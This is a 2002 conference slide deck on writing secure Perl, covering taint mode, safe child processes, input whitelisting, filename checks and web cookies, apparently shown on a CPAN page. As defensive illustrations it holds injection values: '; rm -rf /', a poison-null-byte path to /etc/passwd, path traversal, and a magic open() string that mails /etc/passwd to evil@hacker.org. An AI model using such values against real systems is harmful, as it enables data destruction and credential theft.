Writing Secure Perl Programs

Peter Haworth

pmh@cpan.org

IOP Publishing Ltd.

O'Reilly Open Source Convention July 22-26, 2002

Outline

Robustness
Tainting
Child processes
Validate all user input
Filenames
Magic open()
Web applications
Safe sequence numbers
Dynamic method names

Introduction

Don't trust the user

Implicit trust -> eventual disaster
No trust -> more safety

Robustness

use strict
use warnings
Check return codes of system calls
```
  open STDOUT,'> write-protected';
```

Handle "impossible cases" explicitly

  if( $x == 1 ){
    do_this();
  }elsif( $x == 2 ){
    do_that();
  }

perl -T

Tainting

Data from external sources is tainted

  $^X  @ARGV  %ENV
  <>  read()  readline()  `` qx()    etc
  shmread()  msgrcv()  getpw*()      etc

All data derived from tainted data is also tainted

Tainted data can't affect external sources

  `` qx()  system()  exec()
  kill()
  unlink()  mkdir()  umask()  chmod()    etc
  open() (for writing)  NOT print() or write()

$1, $2, etc are (almost) never tainted
```
  my($untainted) = $tainted =~ /(\d+)/;
```

Child processes

Sanitise the environment
```
  %ENV=( PATH => '/bin:/usr/bin' );
```
Additional %ENV taint checks
```
  PATH IFS CDPATH ENV BASH_ENV
```

Don't invoke the shell

  # Unsafe:    $file eq "; rm -rf /"
  system "prog $file"      and die;

  # Safe
  system "prog \Q$file\E"  and die;

  # No shell, and less taint checks (for now)
  system '/bin/prog',$file and die;

Child processes - Safe pipes

Unsafe

  open my $fh,"| mail $user" or die;
  print $fh $msg;
  close $fh or die;

Safe, but invokes the shell

  open my $fh,"| /bin/mail \Q$user\E" or die;
  print $fh $msg;
  close $fh or die;

Safe and efficient

  defined(my $pid=open my $fh,'|-') or die;
  if(!$pid){
    exec '/bin/mail',$user;
    die "Can't exec";
  }
  print $fh $msg;
  close $fh or die;

Perl 5.8.0 - safe and programmer-efficient

  open my $fh,'|-','/bin/mail',$user or die;
  print $fh $msg;
  close $fh or die;

Validate all user input

Allow safe; don't disallow unsafe

  die "Bad!" if /[;<>&^"']/;     # Bad!

  die "Bad!" unless /\A[\w\s]+\z/; # Good

Check allowed ranges

  my ($num) = $input =~ /\A(\d+)\z/
    or die "Not an integer";

  $num >= 0 && $num <= 100
    or die "Out of range";

Make tests consistent

Filenames

Poison null byte

  # Unsafe if $filename eq "/etc/passwd\0"
  open my $fh, '<', "$filename.safe"
    or die "Invalid filename";

  # Safer
  die "Invalid filename"
    if $filename =~ /\0/;
  open my $fh, '<', "$filename.safe"
    or die "Invalid filename";

Don't allow paths

  # Prevents ../../../../etc/passwd
  die "Invalid filename"
    if $filename =~ m#/#;

Allow safe; don't disallow unsafe

  die "Invalid filename"
    unless $filename =~ /\A\w+\z/;

Magic `open()`

open FH,$fname;

Full magic

  > /etc/passwd
  mail evil@hacker.org < /etc/passwd |

open FH,"< $fname";

Slightly magical

  -f $fname;   # May be a different file

open FH,"< ./$fname\0";

No magic
my $fh=IO::File->new($fname,'<');

No magic, lexical filehandle
open my $fh,'<',$fname;

As above, with perl 5.6.0

Web applications - HTML forms

Hidden fields aren't secure

  <input type="hidden" name="password"
    value="secret">

Expect multiple values

  # Unsafe
  # fname=stuff&fname=action&fname=delete
  %config = (
    action => 'create',
    filename => $cgi->param('fname'),
  );

  # Safe
  $sth->execute(
    scalar $cgi->param('fname')
  );

Expect the unexpected

Web applications - Cookies

Mostly like hidden fields

Message digest adds security

  # Standard with perl 5.8.0
  use Digest::MD5 qw(md5_hex);

  $cookie_val = $val . md5_hex(
    md5_hex($val . $secret1) . $secret2
  );

Check expiry dates

Safe sequence numbers

Not like this!

  my $seqn=$dbh->selectrow_array(q(
    select max(key_field)
    from table1
  ));

Let the database do it for you

  my $seqn=$dbh->selectall_arrayref(q(
    select nextval('name_of_sequence')
  ))->[0][0];

Or do it yourself

  sub nextval{
    my($name)=@_;
    $name=~/\A\w+\z/       or die "Bad sequence name";

    my $fh=IO::File->new("/path/$name",O_RDWR|O_CREAT)
                           or die "Can't open: $!";
    flock $fh,LOCK_EX      or die "Can't lock: $!";
    chomp(my $next=<$fh>);
    ++$next;
    seek $fh,0,0           or die "Can't rewind: $!";
    print $fh "$next\n"    or die "Can't write: $!";
    close $fh              or die "Can't close: $!";

    return $next;
  }

Dynamic method names

`$obj -> $meth ()`

Works if $meth is a method name

  my $meth = 'do_stuff';
  $obj -> $meth ();     # $obj->do_stuff()

Works across packages

  my $meth = 'Other::Pkg::do_stuff';
  $obj -> $meth ();

Taint checks don't protect

Restrict the user's choice

  if( $meth =~ /\A\w+\z/
    and my $ref = $obj->can("safe_$meth")
  ){
    $obj -> $ref ();
  }

References

http://www.dwheeler.com/secure-programs/: Secure programming for Linux/Unix

http://www.w3.org/Security/Faq/: WWW Security FAQ

perldoc perlsec: Perl documentation on tainting

$CPAN/authors/id/P/PM/PMH/secprog-tpc2002.tgz: Latest version of these slides and speaker's notes

To install talk, copy and paste the appropriate command in to your terminal.

cpanm

cpanm talk

CPAN shell

perl -MCPAN -e shell
install talk

For more information on module installation, please visit the detailed CPAN module installation guide.

	Global
`s`	Focus search bar
`?`	Bring up this help dialog

	GitHub
`g` `p`	Go to pull requests
`g` `i`	go to github issues (only if github is preferred repository)

	POD
`g` `a`	Go to author
`g` `c`	Go to changes
`g` `i`	Go to issues
`g` `d`	Go to dist
`g` `r`	Go to repository/SCM
`g` `s`	Go to source
`g` `b`	Go to file browse

	Search terms
module: (e.g. module:Plugin)
distribution: (e.g. distribution:Dancer auth)
author: (e.g. author:SONGMU Redis)
version: (e.g. version:1.00)